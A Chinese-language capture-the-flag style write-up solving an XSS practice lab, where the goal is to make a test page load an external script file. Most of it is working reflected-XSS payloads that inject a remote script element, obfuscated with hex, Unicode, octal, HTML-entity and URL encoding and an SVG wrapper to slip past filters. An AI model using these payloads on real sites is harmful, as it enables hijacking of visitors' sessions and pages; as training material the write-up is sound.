當你的才華
還撐不起你的野心時
那你就應該靜下心來學習
開頭,先感謝小草表哥提供的XSS 練習靶場和羣裏師傅們分享的思路,謝謝大哥們,抱腿真舒服,奇奇怪怪的知識真多。
目錄
0x01 獨孤九劍第一手式【小草】
昨夜,看羣看到小草表哥做的XSS練習靶場,今天睡醒了後來學習一下一些又多了的奇奇怪怪的姿勢,我們首先訪問頁面,發現有一個師傅已經給出了思路,這題不是講XSS漏洞的發現,而是XSS漏洞的利用方法,拿掃描器你掃不出啥來的。
題目:
要求我們加載任意JS代碼,且成功加載http://xcao.vip/xss/alert.js
window._alert=alert; window.alert=function(data){ _alert("success"); } alert(1);
實體編碼轉換地址:http://bianma.51240.com/
0x02 Eval+JavaScript 編碼繞過
解題思路:
- 通過使用 document.createElement() 方法來創建 <script>元素。
- 然後利用document.body.appendChild() 方法,將指定的DOM類型的節點加到document.body的末尾。
十六進制:
\x61\x67\x61\x6E\x3D\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x53\x43\x52\x49\x50\x54\x27\x29\x3B\x61\x67\x61\x6E\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x78\x63\x61\x6F\x2E\x76\x69\x70\x2F\x78\x73\x73\x2F\x61\x6C\x65\x72\x74\x2E\x6A\x73\x27\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x62\x6F\x64\x79\x2E\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x28\x61\x67\x61\x6E\x29\x3B
XSS PayLod:
agan=document.createElement('SCRIPT');agan.src='http://xcao.vip/xss/alert.js';document.body.appendChild(agan);
成功彈窗
Unicode:
\u0061\u0067\u0061\u006E\u003D\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006C\u0065\u006D\u0065\u006E\u0074\u0028\u0027\u0053\u0043\u0052\u0049\u0050\u0054\u0027\u0029\u003B\u0061\u0067\u0061\u006E\u002E\u0073\u0072\u0063\u003D\u0027\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0078\u0063\u0061\u006F\u002E\u0076\u0069\u0070\u002F\u0078\u0073\u0073\u002F\u0061\u006C\u0065\u0072\u0074\u002E\u006A\u0073\u0027\u003B\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0062\u006F\u0064\u0079\u002E\u0061\u0070\u0070\u0065\u006E\u0064\u0043\u0068\u0069\u006C\u0064\u0028\u0061\u0067\u0061\u006E\u0029\u003B
XSS Paylod:
http://xcao.vip/test/xss1.php?data=xxx%22%3E%3Cscript%3Eeval.call`${%27\141\147\141\156\075\144\157\143\165\155\145\156\164\056\143\162\145\141\164\145\105\154\145\155\145\156\164\050\047\123\103\122\111\120\124\047\051\073\141\147\141\156\056\163\162\143\075\047\150\164\164\160\072\057\057\170\143\141\157\056\166\151\160\057\170\163\163\057\141\154\145\162\164\056\152\163\047\073\144\157\143\165\155\145\156\164\056\142\157\144\171\056\141\160\160\145\156\144\103\150\151\154\144\050\141\147\141\156\051\073%27}`%3C/script%3E
八進制:
\141\147\141\156\075\144\157\143\165\155\145\156\164\056\143\162\145\141\164\145\105\154\145\155\145\156\164\050\047\123\103\122\111\120\124\047\051\073\141\147\141\156\056\163\162\143\075\047\150\164\164\160\072\057\057\170\143\141\157\056\166\151\160\057\170\163\163\057\141\154\145\162\164\056\152\163\047\073\144\157\143\165\155\145\156\164\056\142\157\144\171\056\141\160\160\145\156\144\103\150\151\154\144\050\141\147\141\156\051\073
XSS Payload:
http://xcao.vip/test/xss1.php?data=xxx%22%3E%3Cscript%3Eeval.call`${%27\141\147\141\156\075\144\157\143\165\155\145\156\164\056\143\162\145\141\164\145\105\154\145\155\145\156\164\050\047\123\103\122\111\120\124\047\051\073\141\147\141\156\056\163\162\143\075\047\150\164\164\160\072\057\057\170\143\141\157\056\166\151\160\057\170\163\163\057\141\154\145\162\164\056\152\163\047\073\144\157\143\165\155\145\156\164\056\142\157\144\171\056\141\160\160\145\156\144\103\150\151\154\144\050\141\147\141\156\051\073%27}`%3C/script%3E
0x03 HTML 實體編碼+URL編碼繞過
解題思路:
可縮放矢量圖形(SVG)是用於二維圖形的基於XML的矢量圖像格式,並支持交互性和動畫。
SVG文件還支持嵌入式javascript代碼。例如,開發人員可能在svg圖像中使用javascript,以便他們可以實時進行操作。
如果網站使用XSS有效負載加載SVG文件,則將執行該文件。
- 將document 這段代碼先進行Html 實體編碼後,再進行HTML 實體編碼後,再進行URL編碼
- 最後,使用<SVG>繞過
注意:HTML標籤中是支持10進制和16進制編碼的,那麼先將javascript:alert(1)做10進制編碼,再做一次URL編碼,爲什麼需要再做一次編碼呢?是因爲參數值中有&和#,需要一次URL編碼
agan=document.createElement('SCRIPT');agan.src='http://xcao.vip/xss/alert.js';document.body.appendChild(agan);
或
document.body.appendChild(document.createElement('script')).src='http://xcao.vip/xss/alert.js'
XSS Payload:
http://xcao.vip/test/xss1.php?data="><svg><script>%26%23x61%3b%26%23x67%3b%26%23x61%3b%26%23x6E%3b%26%23x3D%3b%26%23x64%3b%26%23x6F%3b%26%23x63%3b%26%23x75%3b%26%23x6D%3b%26%23x65%3b%26%23x6E%3b%26%23x74%3b%26%23x2E%3b%26%23x63%3b%26%23x72%3b%26%23x65%3b%26%23x61%3b%26%23x74%3b%26%23x65%3b%26%23x45%3b%26%23x6C%3b%26%23x65%3b%26%23x6D%3b%26%23x65%3b%26%23x6E%3b%26%23x74%3b%26%23x28%3b%26%23x27%3b%26%23x53%3b%26%23x43%3b%26%23x52%3b%26%23x49%3b%26%23x50%3b%26%23x54%3b%26%23x27%3b%26%23x29%3b%26%23x3B%3b%26%23x61%3b%26%23x67%3b%26%23x61%3b%26%23x6E%3b%26%23x2E%3b%26%23x73%3b%26%23x72%3b%26%23x63%3b%26%23x3D%3b%26%23x27%3b%26%23x68%3b%26%23x74%3b%26%23x74%3b%26%23x70%3b%26%23x3A%3b%26%23x2F%3b%26%23x2F%3b%26%23x78%3b%26%23x63%3b%26%23x61%3b%26%23x6F%3b%26%23x2E%3b%26%23x76%3b%26%23x69%3b%26%23x70%3b%26%23x2F%3b%26%23x78%3b%26%23x73%3b%26%23x73%3b%26%23x2F%3b%26%23x61%3b%26%23x6C%3b%26%23x65%3b%26%23x72%3b%26%23x74%3b%26%23x2E%3b%26%23x6A%3b%26%23x73%3b%26%23x27%3b%26%23x3B%3b%26%23x64%3b%26%23x6F%3b%26%23x63%3b%26%23x75%3b%26%23x6D%3b%26%23x65%3b%26%23x6E%3b%26%23x74%3b%26%23x2E%3b%26%23x62%3b%26%23x6F%3b%26%23x64%3b%26%23x79%3b%26%23x2E%3b%26%23x61%3b%26%23x70%3b%26%23x70%3b%26%23x65%3b%26%23x6E%3b%26%23x64%3b%26%23x43%3b%26%23x68%3b%26%23x69%3b%26%23x6C%3b%26%23x64%3b%26%23x28%3b%26%23x61%3b%26%23x67%3b%26%23x61%3b%26%23x6E%3b%26%23x29%3b%26%23x3B%3b</script></svg>
當然還有其它的繞過姿勢有興趣的可以一 一嘗試DATA協議(IE不支持)、URL編碼等等,此題不是讓你去彈個XSS,而是去加載js文件,別陷入誤區了
雖然我們生活在陰溝裏,但依然有人仰望星空!